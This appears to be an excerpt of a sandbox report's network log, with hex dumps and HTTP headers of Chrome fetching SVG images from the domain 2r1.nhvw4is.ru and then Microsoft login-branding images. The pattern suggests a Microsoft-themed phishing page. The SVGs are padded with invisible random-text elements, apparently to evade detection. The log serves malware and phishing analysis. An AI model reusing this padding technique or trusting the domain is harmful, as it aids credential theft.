                                                                                                                                                              2024-01-17 16:39:34 UTC1369INData Raw: 35 2e 38 20 31 39 38 29 20 72 6f 74 61 74 65 28 38 32 29 20 73 63 61 6c 65 28 31 30 31 37 2e 36 20 31 32 34 39 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 59 7a 4a 52 54 4a 47 53 78 38 4d 59 4f 59 45 52 70 5a 77 30 6a 74 44 4e 61 31 33 33 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                                                                                                                              Data Ascii: 5.8 198) rotate(82) scale(1017.6 1249.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">YzJRTJGSx8MYOYERpZw0jtDNa133</text><stop stop-color="#d83b01" stop-opacity=".75"/><text style="display: inli
                                                                                                                                                              2024-01-17 16:39:34 UTC381INData Raw: 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 63 70 6e 74 5a 7a 65 34 4b 4a 56 32 57 4c 66 55 75 48 63 30 45 34 63 33 6a 6f 55 33 50 3c 2f 74 65 78 74 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 71 4e 6d 6d 55 63 35 4e 76 72 59 6e 43 39 74 77 56 3c 2f 74 65 78 74 3e 3c 2f 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69
                                                                                                                                                              Data Ascii: h: 0.01px;max-height: 0.01px;font-size: 0.01px;">cpntZze4KJV2WLfUuHc0E4c3joU3P</text></clipPath><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">qNmmUc5NvrYnC9twV</text></defs><text style="display: i
                                                                                                                                                              2024-01-17 16:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              53192.168.2.449815172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:34 UTC451OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/3tDjnOJo1wyWZPuEmK2mWIfU HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:35 UTC722INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:35 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SG0Lw7%2FBr6Hs%2BXqcbO%2FIul8wNdP6han9jUDRlBx9uGutgMfxtH5pOQ13DH5Xz9TVaxNnzJgtKKlNjIlhEUCJ4BZi%2FJSejqaqa04gcCKFBFAb2rk50V%2BRASgA4hOh21LChw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008fc1c21432c-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              54192.168.2.449816172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:34 UTC467OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6MipOpOZrol77bJu4Jez1PxICsw/2eVSshKvifDU HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:35 UTC702INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:35 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EOl7%2BY1R1pQcVc58qGbk1IK%2B1fbUqKo9hOLgRQXp%2FOCx2M0sk0g3MWrANoNlaTBsUm2IaqTMaOZuc%2FgXYLqRwfatVvim2N1m6Z%2FKc5RjWuSdVSVVLSX2Dc4jZTBsFKuDug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008fc2b07430d-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:35 UTC667INData Raw: 31 39 34 62 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6a 54 67 37 68 57 72 51 73 33 68 37 38 6b 30 3c 2f 74 65 78 74 3e 3c 74 69 74 6c 65 3e 6e 31 55 50 7a 55 38 34 52 67 6e 4c 54 53 6a 3c 2f 74 69 74 6c 65 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e
                                                                                                                                                              Data Ascii: 194b<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">jTg7hWrQs3h78k0</text><title>n1UPzU84RgnLTSj</title><g opacity=".
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 31 37 32 30 2e 38 20 31 34 30 31 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 41 29 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 35 75 39 37 57 76 4f 46 62 65 53 62 7a 44 75 6e 32 44 61 53 32 4d 4a 74 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35
                                                                                                                                                              Data Ascii: 1720.8 1401.6z" fill="url(#A)"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">5u97WvOFbeSbzDun2DaS2MJt</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-95
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 52 66 52 76 73 4d 6f 4b 42 69 7a 52 63 45 65 34 45 6f 46 3c 2f 74 65 78 74 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f
                                                                                                                                                              Data Ascii: 0.01px;max-height: 0.01px;font-size: 0.01px;">RfRvsMoKBizRcEe4EoF</text><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; co
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 30 2e 30 32 70 78 3b 22 3e 55 6f 42 59 50 63 66 63 75 46 75 72 5a 53 44 58 52 4b 39 49 62 45 74 4d 45 7a 6b 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 5a 50 79 36 67 54 36 6c 6e 69 5a 75 6d 44 42 33 32 4c 67 78 7a 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e
                                                                                                                                                              Data Ascii: 0.02px;">UoBYPcfcuFurZSDXRK9IbEtMEzk</text><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">ZPy6gT6lniZumDB32Lgxz</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inlin
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 36 35 2e 38 20 31 39 38 29 20 72 6f 74 61 74 65 28 38 32 29 20 73 63 61 6c 65 28 31 30 31 37 2e 36 20 31 32 34 39 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 68 59 64 71 46 78 71 44 50 73 66 32 4e 75 47 57 61 4a 69 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65
                                                                                                                                                              Data Ascii: gradientTransform="translate(265.8 198) rotate(82) scale(1017.6 1249.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">hYdqFxqDPsf2NuGWaJi</text><stop stop-color="#d83b01" stop-opacity=".75"/><te
                                                                                                                                                              2024-01-17 16:39:35 UTC340INData Raw: 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 6a 55 65 4b 54 78 34 46 34 59 4f 6f 35 32 7a 57 55 6e 57 4f 4f 48 7a 6c 74 58 67 35 44 3c 2f 74 65 78 74 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 50 72 6b 41 75 41 6c 39 66 76 35 50 56 4b 43 67 69 58 33 31 49 74 6a 58 73 47 3c 2f 74 65 78 74 3e 3c 2f 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b
                                                                                                                                                              Data Ascii: nt-size: 0.01px;">jUeKTx4F4YOo52zWUnWOOHzltXg5D</text></clipPath><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">PrkAuAl9fv5PVKCgiX31ItjXsG</text></defs><text style="display: inline; color: #1A7D75;
                                                                                                                                                              2024-01-17 16:39:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              55192.168.2.449817172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:34 UTC478OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6r1OvgEPyH9fqusm1kFxOY9HI7jFC/2GXuLuN6KqlYKs49PJP4M HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:35 UTC704INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:35 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bjXhzVQbKPxvYDVzE2Oo1PaGsQhjugws7v%2Ba3cf7%2FtsmekoaH6CYvNnbYUVbpP9Qn4Nxnkrsds%2FHWqwuxP31rl%2F99AGVcKUxdEfBx2a13%2FZ4PdXFzMs8M7N4%2FozBGhqOMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008fc2ce47cf3-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:35 UTC665INData Raw: 31 39 30 30 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 62 78 42 72 53 61 54 6c 44 6b 67 4a 3c 2f 74 65 78 74 3e 3c 74 69 74 6c 65 3e 64 77 42 71 51 66 59 63 41 51 46 6d 59 3c 2f 74 69 74 6c 65 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c
                                                                                                                                                              Data Ascii: 1900<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">bxBrSaTlDkgJ</text><title>dwBqQfYcAQFmY</title><g opacity=".2" cl
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 41 29 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 64 61 71 31 42 7a 71 6c 51 66 78 69 7a 56 61 6d 43 30 48 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36
                                                                                                                                                              Data Ascii: 6 1720.8 1401.6z" fill="url(#A)"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">daq1BzqlQfxizVamC0H</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 45 6d 6a 78 70 30 49 48 71 6c 4e 78 59 6a 55 3c 2f 74 65 78 74 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74
                                                                                                                                                              Data Ascii: : 0.01px;font-size: 0.01px;">Emjxp0IHqlNxYjU</text><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-widt
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 42 44 66 35 73 32 39 45 75 6c 64 47 54 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 72 71 47 4e 75 6a 4a 79 6a 41 6e 49 75 78 73 54 71 43 4c 72 75 6b 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78
                                                                                                                                                              Data Ascii: BDf5s29EuldGT</text><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">rqGNujJyjAnIuxsTqCLruk</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max
                                                                                                                                                              2024-01-17 16:39:35 UTC1369INData Raw: 74 65 28 32 36 35 2e 38 20 31 39 38 29 20 72 6f 74 61 74 65 28 38 32 29 20 73 63 61 6c 65 28 31 30 31 37 2e 36 20 31 32 34 39 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 74 57 79 46 6e 73 32 63 53 64 75 57 79 43 63 31 53 47 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63
                                                                                                                                                              Data Ascii: te(265.8 198) rotate(82) scale(1017.6 1249.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">tWyFns2cSduWyCc1SG</text><stop stop-color="#d83b01" stop-opacity=".75"/><text style="display: inline; c
                                                                                                                                                              2024-01-17 16:39:35 UTC267INData Raw: 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6d 66 69 49 31 71 6d 5a 6a 79 47 72 68 68 7a 3c 2f 74 65 78 74 3e 3c 2f 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 70 52 57 4e 65 6d 36 6a 65 6d 4a 46 65 6d 64 35 58 64 3c 2f 74
                                                                                                                                                              Data Ascii: style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">mfiI1qmZjyGrhhz</text></defs><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">pRWNem6jemJFemd5Xd</t
                                                                                                                                                              2024-01-17 16:39:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              56192.168.2.449818152.199.4.734434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:35 UTC688OUTGET /dbd5a2dd-ycck-qdgvaobjxiczh0sbj8queqtpxrg5wachki5wdu/logintenantbranding/0/bannerlogo?ts=636408265539890963 HTTP/1.1
                                                                                                                                                              Host: aadcdn.msauthimages.net
                                                                                                                                                              Connection: keep-alive
